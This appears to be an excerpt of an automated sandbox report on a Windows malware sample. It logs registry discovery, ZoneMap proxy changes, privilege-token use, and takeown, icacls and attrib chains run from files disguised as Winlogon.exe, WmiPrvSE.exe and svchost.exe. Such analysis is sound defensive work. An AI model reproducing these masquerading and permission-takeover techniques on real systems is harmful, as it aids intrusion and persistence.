Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\gambecxd\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
N/A N/A C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1544 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 3788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4364 wrote to memory of 3788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1544 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 3208 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 3208 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 1544 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 2108 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 2108 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 2108 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2108 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 2372 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 2372 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2372 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 3704 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3704 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3704 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3704 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 1916 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 1916 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1916 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1916 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 3236 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3236 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3236 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3236 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 2952 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 2952 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 2952 wrote to memory of 3548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2952 wrote to memory of 3548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1760 wrote to memory of 852 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 852 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 852 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 852 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 4844 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 4844 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4844 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 3352 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3352 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3352 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3352 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 3608 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3608 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3608 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3608 wrote to memory of 4728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 3160 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 3160 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 3160 wrote to memory of 4412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3160 wrote to memory of 4412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 4548 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 4548 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 4548 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4548 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1760 wrote to memory of 4636 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 4636 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 1120 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 1120 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 880 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe
PID 1760 wrote to memory of 880 N/A C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
